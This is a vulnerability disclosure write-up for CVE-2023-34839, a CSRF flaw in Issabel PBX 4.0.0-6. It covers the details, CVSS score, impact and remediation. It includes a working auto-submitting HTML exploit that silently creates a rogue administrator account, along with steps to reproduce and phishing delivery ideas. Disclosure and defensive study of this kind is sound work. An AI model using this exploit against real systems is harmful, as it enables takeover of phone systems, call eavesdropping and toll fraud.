- Overview
- Vulnerability Details
- Affected Software
- CVSS Score
- Attack Scenario
- Proof of Concept (PoC)
- Steps to Reproduce
- Impact
- Remediation
- References
- Disclaimer
CVE-2023-34839 is a Cross-Site Request Forgery (CSRF) vulnerability discovered in Issabel PBX version 4.0.0-6, a widely used open-source Unified Communications platform. The vulnerability resides in the user-management endpoint and allows an unauthenticated remote attacker to silently create a new administrator account by tricking a currently authenticated administrator into visiting a specially crafted webpage.
| Field | Value |
|---|---|
| CVE ID | CVE-2023-34839 |
| Date | 23 June 2023 |
| Researcher | Sahil Ojha |
| Vendor | Issabel |
| Product | Issabel PBX |
| Version | 4.0.0-6 |
| Tested On | Windows |
Issabel PBX 4.0.0-6 does not implement CSRF protections (e.g., synchronizer tokens, SameSite cookie attributes, or Origin / Referer header validation) on the user creation endpoint:
POST /index.php?menu=userlist&action=new
Because the application relies solely on session cookies for authentication and performs no state-changing request validation, a forged POST request submitted from any origin will be accepted and processed with the full privileges of the logged-in administrator session.
Root cause: Absence of anti-CSRF token validation on state-changing administrative endpoints.
Vulnerability class: CWE-352 — Cross-Site Request Forgery (CSRF)
| Software | Version | Status |
|---|---|---|
| Issabel PBX | 4.0.0-6 | Vulnerable ✔ |
- Vendor Homepage: https://www.issabel.org/
- Source Code: https://github.com/IssabelFoundation/issabelPBX
| Metric | Value |
|---|---|
| CVSS v3.1 Vector | AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| Base Score | 8.8 (High) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | Required (admin visit) |
| Scope | Unchanged |
| Confidentiality | High |
| Integrity | High |
| Availability | High |
An attacker can exploit this vulnerability by following these high-level steps:
- Craft a malicious HTML page that contains a hidden form targeting the Issabel PBX user-creation endpoint with attacker-controlled values (username, password, group = administrator).
- Host the malicious page on a server or send it to the target administrator via phishing email, chat message, or any social-engineering vector.
- Wait for the administrator to open the link while having an active, authenticated session with the Issabel PBX application.
- The browser auto-submits the form using the victim's existing session cookie, causing the application to silently create a new administrator account.
- The attacker logs in with the newly created credentials and has full administrator access to the PBX system, including call routing, recordings, SIP trunk configuration, and all system settings.
No interaction beyond a single page visit is required from the victim.
⚠️ For educational and authorised testing purposes only.
Replacelocalhostwith the hostname or IP address of the target Issabel PBX instance.
If testing against anhttps://endpoint with a self-signed certificate, you must first visit the target URL in the same browser and accept the certificate warning; otherwise the browser will block the cross-origin form submission.
<html>
<!-- CSRF Exploit — CVE-2023-34839 -->
<body>
<form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
<input type="hidden" name="save" value="Save" />
<input type="hidden" name="name" value="CSRF" />
<input type="hidden" name="description" value="CSRF Test Account" />
<input type="hidden" name="password1" value="Test@123" />
<input type="hidden" name="password2" value="Test@123" />
<input type="hidden" name="group" value="1" /> <!-- 1 = Administrator -->
<input type="hidden" name="extension" value="" />
<input type="hidden" name="webmailuser" value="" />
<input type="hidden" name="webmaildomain" value="" />
<input type="hidden" name="webmailpassword1" value="" />
<input type="hidden" name="id_user" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>The exploit file is also available in this repository: CSRF Exploit.html
- A running Issabel PBX 4.0.0-6 instance.
- An administrator account with an active browser session.
- A browser on the same machine as the administrator session.
Navigate to the Issabel PBX web interface and log in with administrator credentials.
Copy the PoC HTML code above and save it as a .html file, replacing localhost with the actual hostname or IP address of the target Issabel instance.
The exploit uses hidden form fields to silently POST a new user creation request to the application. When the page loads, the embedded JavaScript immediately submits the form without any visible user action.
Open the saved HTML file in the same browser (in a new tab) while the administrator session is still active. The form will be auto-submitted immediately upon page load.
Navigate back to the Issabel PBX User Management panel. A new user account (in this PoC, named CSRF) will have been created with full Administrator privileges — without any additional interaction beyond opening the exploit page.
Successful exploitation of CVE-2023-34839 allows an attacker to:
- Create rogue administrator accounts on the PBX system, providing persistent full-privilege access.
- Modify call routing and SIP trunks, enabling eavesdropping or toll fraud.
- Access voicemail recordings and call detail records (CDRs), leading to sensitive information disclosure.
- Lock out legitimate administrators by changing passwords or deleting existing accounts.
- Disrupt communications by altering or deleting PBX configuration.
Because the rogue account persists even after the victim's session ends, the attacker retains access indefinitely until the account is discovered and removed.
Issabel PBX administrators and developers should apply the following mitigations:
-
Implement Anti-CSRF Tokens: Generate a unique, unpredictable, session-tied token for every state-changing form. Validate the token server-side before processing any POST request.
-
Apply
SameSite=StrictorSameSite=Laxon Session Cookies: This instructs browsers not to send cookies on cross-site requests, effectively preventing classic CSRF attacks in modern browsers. -
Validate
OriginandRefererHeaders: Reject requests whoseOriginorRefererheader does not match the expected application domain. -
Require Re-authentication for Sensitive Actions: Prompt the administrator for their current password before allowing the creation of new administrator-level accounts.
-
Apply the Latest Security Patches: Monitor the Issabel release page and the official repository for patches addressing this CVE.
- NVD — CVE-2023-34839
- OWASP — Cross-Site Request Forgery (CSRF)
- CWE-352: Cross-Site Request Forgery
- Issabel Official Website
- IssabelFoundation/issabelPBX on GitHub
This repository is intended strictly for educational purposes and authorised security research. The information and proof-of-concept code provided here must only be used against systems you own or have explicit written permission to test. Unauthorised use of this exploit against systems you do not own is illegal and may result in criminal prosecution. The author assumes no liability for any misuse of the information contained in this repository.